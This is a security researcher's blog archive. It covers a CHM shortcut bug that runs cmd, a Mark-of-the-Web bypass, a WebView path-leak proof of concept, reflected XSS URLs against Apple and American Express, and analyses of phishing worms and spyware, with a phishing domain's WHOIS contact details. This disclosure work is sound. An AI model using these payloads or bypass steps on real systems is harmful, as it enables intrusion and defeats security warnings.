CodeTrouble, a blog by Rafel Ivgi (http://www.blogger.com/profile/10296831179799063154)<br /><br /><strong>If we could only control that window class...</strong> (2010-03-20)<pre><br />This is an example of a file run from within a local chm file.<br />Local chm files are treated as executables.<br />The following is research into an interesting bug and NOT a<br />discussion of a practical security vulnerability.<br /><br />[OBJECT<br /> id=hh<br /> classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"<br /> width=100<br /> height=100<br />]<br /> [PARAM name="Command" value="ShortCut"]<br /> [PARAM name="Button" value="Bitmap:shortcut"]<br /> [PARAM name="Item1" value=",cmd,/c"]<br /> [PARAM name="Item2" value="273,1,1"]<br />[/OBJECT]<br /><br />[script]<br /><br /> // The chm loads, executes a process, and the process is closed.<br /> // The script then clicks the shortcut object after the process has already been closed,<br /> // so hh.exe tries to build an error message using a format string (wsprintfA). The error message is:<br /> // "The program specified for the shortcut was started, but the window class "%s" could not be found."<br /> // It then attempts to read the window class that was assigned to the executed process, which was<br /> // freed/destroyed/released when the process was closed. 
This causes the address that is pulled from the stack to be 3 letters<br /> // from the error message itself plus another byte: " th\x54"<br /><br /> // Exploitation would require the ability to manipulate the window class.<br /> // A proper fix would be one of the following:<br /> // 1) Checking if the window class still exists before using it<br /> // 2) Making a copy of the window class name upon process creation and using that copy<br /> // 3) Removing the format string message<br /><br /> hh.Click();<br />[/script]<br /></pre><br /><br /><strong>Using Nmap Remotely Through F5 FirePass VPN</strong> (2009-12-11)<br />Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.<div>I was connected to a network remotely through the company's F5 VPN appliance and I wanted to scan the internal network.</div><div>It looked like:</div><pre>Microsoft Windows XP [Version 5.1.2600]<br />(C) Copyright 1985-2001 Microsoft Corp.<br /><br />C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*</pre><div>Once I pressed "Enter" I got:</div><pre>Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard Time<br />WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won't work on Windows.<br /><br />pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 5 seconds then retry.<br /><br />pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 25 seconds then retry.<br /><br />Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: The system cannot find the device specified. (20)<br /><br />There are several possible reasons for this, depending on your operating system:<br />LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.<br /><br />*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV &lt;device&gt;; or use mknod).<br /><br />*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the --unprivileged command-line argument will help.<br /><br />SOLARIS: If you are trying to scan localhost or the address of an interface and are getting '/dev/lo0: No such file or directory' or 'lo0: No DLPI device found', complain to Sun. I don't think Solaris can support advanced localhost scans. You can probably use "-PN -sT localhost" though.<br /><br />QUITTING!</pre><div>Then I realized that the VPN connection was a PPP device, which is probably at the top of the interface order list, so Nmap was trying to use it for the scan. That is the point of failure, because Nmap on Windows without raw sockets (meaning Windows XP SP2 and later) can only use Ethernet devices. So I played "Imaginary Linux on Windows" and added the option "-e eth0", which tells Nmap to use the Ethernet device indexed at 0, and it worked like a charm.</div><pre>C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*<br /><br />Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time<br />Interesting ports on XXXXX (192.168.0.1):<br />PORT    STATE    SERVICE<br />445/tcp filtered microsoft-ds<br /><br />Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds</pre><br /><strong>Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables</strong> (2009-12-11)<br />I was in another day of jumping from client to client, securing another bank in Israel, when my girlfriend called and said "Honey, I am at the office, I have absolutely nothing to do and I can't connect from here to our computer at home to continue my project". I said, O.K., let's see what we can do in a 5 minute phone call. Now I just want to make it clear: my girlfriend is an Information Systems Instructor, she is no developer or hacker.<div><br /></div><div>Me: "Honey, go to http://www.teamviewer.com, can you download it?"</div><div>Her: "yes, but when I run the setup.exe it says something weird like 'windows has blocked this software because it can't verify the publisher' and it won't let me install"</div><div><br /></div><div><img src="http://3.bp.blogspot.com/_18YBLFP2tdA/SyIeGz93QeI/AAAAAAAAAFg/-DTZCAO2iEc/s400/cant+verify+publisher.JPG" style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 187px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5413922804430488034" /></div><div><br /></div><div>Me: "O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start->Run. Now add ':Zone.Identifier' just before the last quotes. 
What do you see?"</div><div>Her: "I see something like ZoneId=3, now what?"<br />Me: "I can't talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye"</div><div><br /></div><div>After 10 minutes I get an SMS: "thanks honey it worked!!!".</div><div>Well, we found a bug. I wouldn't really call it a "Privilege Escalation", but I guess you don't have to be a hacker to bypass Windows security restrictions :)</div><br /><br /><strong>Exploiting WebView through Internet Explorer to remotely discover windows directory</strong> (2009-07-09)<br />As with any large product, the Microsoft Windows operating system is built on the code of its previous versions. Some of this code even goes back as far as Microsoft Windows 98.<br /><br />In Windows 98 a new look called "WebView" was introduced: the way folders are displayed and the way the desktop is displayed were all HTML templates, which were also editable by the default administrative user. You can read more about it here: http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx<br /><br />Those HTML templates had the extension "htt". In order for the folder templates to function properly and be able to display the current folder, a few automatically expanded variables were added to the module filtering the "htt" files. 
These are:<br />%TEMPLATEDIR% (hardcoded)<br />%THISDIRPATH% (hardcoded)<br />%THISDIRNAME% (hardcoded)<br />%BACKGROUNDIMAGE% (registry)<br />%LOGOLINE% (registry)<br /><br />This mechanism lives on to this day, deep inside Windows XP's code, in two modules in the system32 folder:<br />1) Webvw.dll<br />2) Mshtml.dll<br /><br />Webvw.dll is the module responsible for all the WebView installation and normal activity, and mshtml.dll is the main module for HTML filtering &amp; rendering used by Windows Explorer and Internet Explorer.<br /><br />When Microsoft Windows is installed and webvw.dll is registered, it adds its CLSID and a few registry keys. The interesting ones are these:<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\BACKGROUNDIMAGE<br />Default = "%SystemRoot%\Web\wvleft.bmp"<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\LOGOLINE<br />Default = "%SystemRoot%\Web\wvline.gif"<br /><br />Every time an htt file is rendered, without any local/remote or zone consideration, those variables are replaced with the current system's path.<br />This is the code inside mimeflt.cpp which contains the bug (lines 360 to 433):<br /><pre><br />#define REG_WEBVIEW_TEMPLATE_MACROS TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WebView\\TemplateMacros")<br /><br />void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {<br />    if (SIZEOF(char) == nCharSize) {<br />        SHAnsiToTChar((LPCSTR)pBuf, psz, cch);<br />    } else {<br />        ASSERT(nCharSize == SIZEOF(WCHAR));<br />        SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);<br />    }<br />}<br /><br />// Expands a registry-backed macro: the macro name is appended to the TemplateMacros<br />// key path and that key's default value is returned. Nothing here asks where the<br />// template being filtered came from.<br />void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {<br />    TCHAR szExpansion[MAX_PATH];<br />    szExpansion[0] = TEXT('\0');<br />    TCHAR szTCharMacro[MAX_PATH];<br /><br />    ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));<br />    TCHAR szKey[MAX_PATH];<br />    lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));<br />    StrCatBuff(szKey, TEXT("\\"), ARRAYSIZE(szKey));<br />    StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));<br />    HKEY hkMacros;<br />    if (RegOpenKey(HKEY_CURRENT_USER, szKey, &amp;hkMacros) == ERROR_SUCCESS &amp;&amp; RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &amp;hkMacros) == ERROR_SUCCESS) {<br />        DWORD dwType;<br />        DWORD cbData = SIZEOF(szExpansion);<br />        SHQueryValueEx(hkMacros, NULL, NULL, &amp;dwType, (LPBYTE)szExpansion, &amp;cbData);<br />        RegCloseKey(hkMacros);<br />    }<br /><br />    ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);<br />}<br /><br />// Called for every %VAR% in the template: the three hardcoded names are handled<br />// directly and everything else falls through to the registry lookup above.<br />int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {<br />    if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {<br />        if (!_szTemplateDirPath[0]) {<br />            GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);<br />        }<br /><br />        *ppszExp = _szTemplateDirPath;<br /><br />    } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {<br />        if (!_szThisDirPath[0]) {<br />            _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));<br />        }<br />        *ppszExp = _szThisDirPath;<br /><br />    } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {<br />        if (!_szThisDirName[0]) {<br />            _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));<br />        }<br />        *ppszExp = _szThisDirName;<br /><br />    } else {<br />        ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);<br />        *ppszExp = _szExpansion;<br />    }<br /><br />    return _StrLen(*ppszExp);<br />}<br /></pre><br />In Windows XP the variables "%THISDIRPATH%" and "%THISDIRNAME%" were removed from the MIME filter, which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% are still translated into the current Windows directory.<br /><br />The Proof Of Concept code (Remote 
WebView Macro Translation):<br />Save it on a remote host with an htt extension and replace "http:///filter_trap.htt<br />--------------------------- filter_trap.htt start --------------------------------<br />[div id="BACKGROUNDIMAGE"]%BACKGROUNDIMAGE%[/div]<br />[div id="LOGOLINE"]%LOGOLINE%[/div]<br />[div id="TEMPLATEDIR"]%TEMPLATEDIR%[/div]<br />[script]<br />alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);<br />alert(document.getElementById("LOGOLINE").innerHTML);<br />alert(document.getElementById("TEMPLATEDIR").innerHTML);<br />[/script]<br />--------------------------- filter_trap.htt end --------------------------------<br /><br /><strong>Security Cameras - To See Or Not To See?!</strong> (2009-06-15)<br />These days, security is going digital.<br /><br />From live and automatic event log analysis to personal "on-key" tokens and remotely controlled security cameras.<br /><br />These technologies should be used carefully. For example, if the token generates 6 digits and there is no password complexity enforcement, users can set their password to "1" and we end up with a 7 character password. If the data from the log is not filtered and is displayed in HTML format, it may execute code. Even worse, if it is viewed at the command line console, it may execute code using the console color control characters.<br /><br />When talking about security cameras, a security flaw in the camera's simple application server may make the entire video stream accessible to an intruder.<br /><br />While consulting for a big financial customer, I discovered that the installed security cameras are easily accessible to anyone thanks to a very simple logical flaw. 
Not to mention default user accounts, empty passwords, the ability to brute force, directory traversal and some classic authorization bypass vulnerabilities.<br /><br />Most of the security cameras in my country are bought from Korea; some of the software is written by the vendor and some by the distributor. Both of them should pay much more attention to security so we won't have the same classic vulnerabilities over and over again.<br /><br />Attached are a few screen captures:<br /><br /><a href="http://www.linkstofiles.com/images/11.jpg"><img alt="another white night at work" src="http://www.linkstofiles.com/images/11.jpg" width="344" height="227" /></a><br /><br />another white night at work<br /><br /><a href="http://www.linkstofiles.com/images/9.jpg"><img alt="Clothing Shop" src="http://www.linkstofiles.com/images/9.jpg" width="390" height="310" /></a><br /><br />Clothing Shop<br /><br /><a href="http://www.linkstofiles.com/images/6.jpg"><img alt="Coffee Shop" src="http://www.linkstofiles.com/images/6.jpg" width="314" height="300" /></a><br /><br />Coffee Shop<br /><br /><a href="http://www.linkstofiles.com/images/8.jpg"><img alt="Eyes on the ball!!!" src="http://www.linkstofiles.com/images/8.jpg" width="393" height="311" /></a><br /><br />Eyes on the ball!!!<br /><br /><a href="http://www.linkstofiles.com/images/10.jpg"><img alt="How's that shirt?" src="http://www.linkstofiles.com/images/10.jpg" width="392" height="309" /></a><br /><br />How's that shirt?<br /><br /><a href="http://www.linkstofiles.com/images/19.jpg"><img alt="Anyone knows a Safe-Cracker?!" src="http://www.linkstofiles.com/images/19.jpg" width="344" height="226" /></a><br /><br />Anyone knows a Safe-Cracker?!<br /><br /><strong>ICQ Phishing - You Type, They Sell</strong> (2009-05-04)<br />My friend ax1les has a 5 digit ICQ number and he always gets weird messages that turn out to be phishing or links to trojans. A few days ago, he got this message:<br /><br /><a href="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9Ii9KecrI/AAAAAAAAAFQ/ln9M1O5zpSU/s1600-h/1.bmp"><img style="MARGIN: 0px 10px 10px 0px; WIDTH: 400px; FLOAT: left; HEIGHT: 213px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5332060249201210034" border="0" alt="" src="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9Ii9KecrI/AAAAAAAAAFQ/ln9M1O5zpSU/s400/1.bmp" /></a><br /><br />He thought it would be a good idea for us to take a look at that website together, and we did :)<br /><br /><a href="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9I3Sc0TvI/AAAAAAAAAFY/Gtmdoef_WFg/s1600-h/2.bmp"><img style="MARGIN: 0px 10px 10px 0px; WIDTH: 400px; FLOAT: left; HEIGHT: 249px; CURSOR: hand" id="BLOGGER_PHOTO_ID_5332060598512668402" border="0" alt="" src="http://3.bp.blogspot.com/_18YBLFP2tdA/Sf9I3Sc0TvI/AAAAAAAAAFY/Gtmdoef_WFg/s400/2.bmp" /></a><br />In the last decade Russians have really made fun of the world using the Internet.<br />The website <a href="http://icq-confirm.info/">http://icq-confirm.info/</a> is a phishing website that "confirms" your ICQ account credentials are still valid (yeah right). 
The amazing thing is he didn't even bother changing the title from the former text "icq.com" :)<br /><br />But of course his business is really successful as he is also the owner of the mega-icq-shop, he is trying to hide so much that he event left it in the domain's whois details......<br /><br />Domain ID:D28335226-LRMS<br />Domain Name:ICQ-CONFIRM.INFO<br />Created On:20-Apr-2009 07:27:17 UTC<br />Last Updated On:29-Apr-2009 15:01:04 UTC<br />Expiration Date:20-Apr-2010 07:27:17 UTC<br />Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)<br />Status:CLIENT TRANSFER PROHIBITED<br />Status:TRANSFER PROHIBITED<br />Registrant ID:DI_9732581<br />Registrant Name:Andrey Petrovich<br />Registrant Organization:Private person<br />Registrant Street1:Krasnoarmeyskaya 18 dom 4 kv 32<br />Registrant Street2:<br />Registrant Street3:<br />Registrant City:Moskva<br />Registrant State/Province:Moskva<br />Registrant Postal Code:132132<br />Registrant Country:RU<br />Registrant Phone:+7.4951783223<br />Registrant Phone Ext.:<br />Registrant FAX:<br />Registrant FAX Ext.:<br /><strong>Registrant Email:mega-icq-shop@mail.ru</strong><br />Admin ID:DI_9732581<br />Admin Name:Andrey Petrovich<br />Admin Organization:Private person<br />Admin Street1:Krasnoarmeyskaya 18 dom 4 kv 32<br />Admin Street2:<br />Admin Street3:<br />Admin City:Moskva<br />Admin State/Province:Moskva<br />Admin Postal Code:132132<br />Admin Country:RU<br />Admin Phone:+7.4951783223<br />Admin Phone Ext.:<br />Admin FAX:<br />Admin FAX Ext.:<br /><strong>Admin Email:mega-icq-shop@mail.ru</strong><br />Billing ID:DI_9732581<br />Billing Name:Andrey Petrovich<br />Billing Organization:Private person<br />Billing Street1:Krasnoarmeyskaya 18 dom 4 kv 32<br />Billing Street2:<br />Billing Street3:<br />Billing City:Moskva<br />Billing State/Province:Moskva<br />Billing Postal Code:132132<br />Billing Country:RU<br />Billing Phone:+7.4951783223<br />Billing Phone 
Ext.:<br />Billing FAX:<br />Billing FAX Ext.:<br /><strong>Billing Email:mega-icq-shop@mail.ru</strong><br />Tech ID:DI_9732581<br />Tech Name:Andrey Petrovich<br />Tech Organization:Private person<br />Tech Street1:Krasnoarmeyskaya 18 dom 4 kv 32<br />Tech Street2:<br />Tech Street3:<br />Tech City:Moskva<br />Tech State/Province:Moskva<br />Tech Postal Code:132132<br />Tech Country:RU<br />Tech Phone:+7.4951783223<br />Tech Phone Ext.:<br />Tech FAX:<br />Tech FAX Ext.:<br /><strong>Tech Email:mega-icq-shop@mail.ru</strong><br />Name Server:NS1.AGHOST.RU<br />Name Server:NS2.AGHOST.RU<br /><br />Anyway, the really weird thing about this case is that while I am writing this post the website is not loading anymore...the DNS no longer resolves to any IP, and their former IP 95.211.7.5 responds with "Apache is working properly" when requesting the Host "icq-confirm.info".<br />Maybe I scared them away with a few little DNS requests, or the cops just randomly knocked on their door :)Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com0tag:blogger.com,1999:blog-9114770521689436630.post-12217587632546976242008-12-28T22:30:00.000-08:002008-12-28T23:58:40.562-08:00The "DesktopSmiley, Not A Spyware" ToolBarThe "Not A Phishing Worm" really got me interested, as it sent special Christmas messages, so I decided to dig in just a bit. As discovered, after the user supplies his MSN credentials, his friends get a link to the "Not A Phishing" website and a lot of tricky links leading to DesktopSmiley.com to download their toolbar, which they say is "Not Spyware".<br /><br />So we have a non-phishing worm downloading a non-spyware program; let's see its non-evil actions :)<br />The first thing I did was to download the installer, which asks no questions and shows no EULA. 
It is also digitally signed by "DoubleD Advertising Limited"; well, that's really funny, we have got to give them that :)<br /><br />So I ran it in a VM:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SVhz9s8NJTI/AAAAAAAAAE4/LNSmRCYasUg/s1600-h/virutalized.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 85px;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SVhz9s8NJTI/AAAAAAAAAE4/LNSmRCYasUg/s400/virutalized.JPG" alt="" id="BLOGGER_PHOTO_ID_5285101666592171314" border="0" /></a><br /><br />That is quite original! "A non-virtualized hardware system is required"; of course anybody technical sees how lame this lie is :)<br />Why would an IE toolbar "require" non-virtualized hardware? Why would it even bother to check whether it's running in a virtualized environment, unless it has something illegal to hide?!<br /><br />Well, I am definitely not going to execute it on my machine :)<br />Maybe I will test it some other day on a real machine with Restore-IT/Ghost.<br /><br />In the meantime, let's take a look at some of the things that it does:<br />It copies some IE settings from HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ to HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (AutoDetect and UNCAsIntranet already exist there and get modified):<br />ProxyBypass:1 (default 1)<br />IntranetName:1 (default 1)<br />MigrateProxy:1 (default 1)<br />AutoDetect:1 (default 0)<br />UNCAsIntranet:1 (default 0)<br />ProxyEnable:0 (default 0)<br /><br />It sure looks like someone is going to assign a proxy for us :)<br /><br />The setup process command line:<br />"C:\Documents and Settings\Insider\Local Settings\Temporary Internet Files\{5617ECA9-488D-4BA2-8562-9710B9AB78D2}\stbup.exe" /new /src=user<br /><br />The "/src=user" really sounds like there are cases in which the user did not initiate 
the installation :) It could be used for self-update, though.<br /><br />Let's examine some of the strings in the memory of this "DoubleD" software:<br />Software\SimonTatham\PuTTY\Sessions<br />Software\SimonTatham\PuTTY\SshHostKeys<br />Software\SimonTatham\PuTTY<br />\PUTTY.RND<br />Well, I don't want to point a blaming finger, but it seems this "legitimate smiley IE toolbar" is very interested in getting access to our saved PuTTY SSH hosts...quite innocent.<br /><br />There is a lot of weird stuff this spyware does, like starting a local proxy, which explains how they steal data from IE and makes this self-updating software a cool way to build a non-botnet botnet :)<br />It also implements an SSH client and almost every famous encryption algorithm (Rijndael, AES, DES, 3DES, Blowfish); it looks like it performs local MITM attacks on SSH login software.<br /><br />So get root and smile away with it :)Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com3tag:blogger.com,1999:blog-9114770521689436630.post-61780792945339002182008-12-24T18:54:00.001-08:002008-12-24T18:54:59.868-08:00Big Brands XSS<span class="postbody"><br />Apple Store - XSS (less than 15 minutes to find it, manually)<br /><textarea rows=8 cols=48>http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'"><script>alert("The apple didn't fell far from the last apple")</script>%3E%3Cdiv%20id=%22</textarea><br /><br />American Express - HTTPS XSS (less than a minute to find it, manually)<br /><textarea rows=8 cols=48>https://www01.extra.americanexpress.com/ProductImage.aspx?url=https://merpic.intelliwebservices.com/img/full/10185/b2/50fe31e266936b2887ab3ef9608f2db2.gif%22%3E%3Cscript%3Ealert(%27American%20XSSspress%27)%3C/script%3E%3Cdiv%20id=%22</textarea><br /><br /></span><br /><span class="postbody"></span>How can we customers trust the big brand companies when our accounts are compromised and we can no longer trust links to those empires' 
websites?!</span>Rafel Ivgihttp://www.blogger.com/profile/10296831179799063154noreply@blogger.com1tag:blogger.com,1999:blog-9114770521689436630.post-81130559541278143102008-12-18T19:37:00.001-08:002009-01-13T03:06:40.852-08:00The MSN "Not A Phishing Worm"This is a funny one, actually :)<br />I was just working as usual when I got the following message on my MSN Messenger:<br /><blockquote>This is how real girls party. Great high quality pictures on<br />http://jusmineza.PartyPicturez.info</blockquote>Now of course I understood that it's a worm, but still, let's see where it leads.<br />So I went to the site and it looked like this:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_18YBLFP2tdA/SUsYOiHeOBI/AAAAAAAAAEU/qcNjsVZd9ho/s1600-h/msnphishing.bmp"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_18YBLFP2tdA/SUsYOiHeOBI/AAAAAAAAAEU/qcNjsVZd9ho/s400/msnphishing.bmp" alt="" id="BLOGGER_PHOTO_ID_5281341625977419794" border="0" /></a><br /><br />From what I have seen so far, this is a classic phishing site; I saw dozens<br />like it for Yahoo! in the past. But wait! Let's look at that GREY text below:<br /><p><a name="terms"></a></p><blockquote><p><a name="terms">Terms of Use / Privacy Policy:</a></p> <a name="terms"> </a><p><a name="terms">By filling out this form, you authorize T P Ltd to spread the word about this new 100% real and upcoming Messenger Community Site. You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.</a></p> <a name="terms"> </a><p><a name="terms">We do not share your private information with any third parties. 
By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a "phishing" site that attempts to "trick" you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.</a></p> <a name="terms"> </a><p><a name="terms">This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).</a></p> <a name="terms"> </a><p><a name="terms">ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.</a></p> <a name="terms"> </a><p><a name="terms">We may temporarily access your MSN account to do a combination of the following: 1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.</a></p> <a name="terms"> </a><p><a name="terms">This is a free service. You will not be asked to pay at any time. You will not be subscribed to anything asking for payment. This service is made possible by many hours of human effort. </a></p> <a name="terms"> </a><p><a name="terms">T P Ltd reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference. </a></p> <a name="terms"> </a><p><a name="terms">You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. 
You also understand that by temporarily accessing your msn account, T P Ltd is NOT agreeing to MSN's terms of use and therefore not bound by them.</a></p> <a name="terms"> </a><p><a name="terms">This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.</a></p> <a name="terms"> </a><p><a name="terms">If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not affect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.</a></p> <div id="copyr"> <a name="terms"> </a><center><a name="terms">Copyright 2008 T P Ltd</a></center></div></blockquote><div id="copyr"><center><a name="terms"></a></center> </div><a name="terms">OK, they said in the text:<br /></a><blockquote><a name="terms">This is not a "phishing" site that attempts to "trick" you into revealing personal information.</a></blockquote>So they don't want our usernames and passwords, and for most people the username is also their EMAIL address; yeah, I believe them, sure.<br /><br />They just want to:<br /><blockquote><a name="terms">1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.</a><br /></blockquote>Which is completely different from what a worm does. 
A worm just spreads and "introduces" "entertaining" sites full of porn and exploits.<br /><a name="terms"></a><blockquote><a name="terms">By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us.</a><br />.....<br /><a name="terms">ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED</a></blockquote>Yeah, why not: take my account and send spam "<a name="terms">on behalf of third parties</a>", and if they get, like, hacked or something, "we are not responsible, you agreed to this".<br /><br />I believe this should be called "Legal Phishing User Agreement" or "Worm As A Service".<br />It is also a little weird that a "legal" domain called "partypicturez.info" is dealing with MSN accounts and not PICTURES FROM PARTIES, and has unlimited (*.) subdomains and only 1 page, don't you think?!<br />Of course they used domain privacy protection:<br /><blockquote>Registrant Email:9648af2d68114548bfc703cca6806a46.protect@whoisguard.com<br />Admin Name:WhoisGuard Protected<br />Admin Organization:WhoisGuard</blockquote>Well, don't fill in any form you see without reading the small (and in this case GREY) print :)<br /><p>Update:<br />The messages are updated hourly; these ones are specific to Xmas.<br />Any file or subdomain in win-win-it.com redirects to http://www.desktopsmiley.com/go.do?a=814<br />The same worm also sends this message:</p> <blockquote><p>"[msn_dst_user], claim your Prize!<br />http://[msn_src_user].win-win-it.com/winner.php"</p></blockquote> <p>And</p><blockquote>congratulations [msn_dst_user]!!!<br />http://[msn_src_user].accept-your-gift.com/winner.php<br /></blockquote><p>And</p><blockquote>merry XMAS heres your gift<br />http://[msn_src_user].specialofferforyou.info/gift.php<br 
/></blockquote><p>And</p><blockquote><p>[msn_dst_user], claim your Xmas Card!<br />http://[msn_src_user].greeting-cardss.com/xmas.php</p></blockquote><p>And</p><blockquote>http://freegiftznow.com/xmas.php</blockquote>And<br /><blockquote>[msn_dst_user], see the pics from yesterday's christmas party what do u think?<br />http://[msn_src_user].yourimagez.com/xmas.php<br /></blockquote>And this one, which redirects to http://www.xxxblackbook.com<br /><blockquote>Mmmm Babe!<br /><br />Just got myself a naughty profile here. You should check me out before its too late!<br /><br />http://www.theblogboards.com/profiles.php</blockquote>And this one, which is misconfigured and will not work when the subdomain contains an "_":<blockquote>http://[msn_src_user].crazy-new-year-party-pics.com </blockquote>And<br /><blockquote>http://nu-years.awesomeofferz.com</blockquote>And<br /><blockquote>http://[msn_src_user].real-cool-newyear-party-pics.com<br /></blockquote>And<br /><blockquote>Claim your Prize! EXPIRY: TODAY!!!! Hurry<br />http://mypoemstoyou.com/winner.php</blockquote>And<br /><blockquote>see pictures of me naked &amp; fucking all night long!! LOL<br />http://www.seex4u.com/collegepics.php</blockquote>And<br /><blockquote>see my 2009 new years party album i uploaded here <:o)<:o) http://2009-newyear-party-pics.com/party.php</blockquote>And this one, which redirects to http://www.naughty-nightz.com/<br /><blockquote>see this blog<br />http://theblogboards.com/blog.php<br /></blockquote>And<br /><blockquote>hey babe... i created a profile here with some of my secret pictures.... dont wait too long .... 
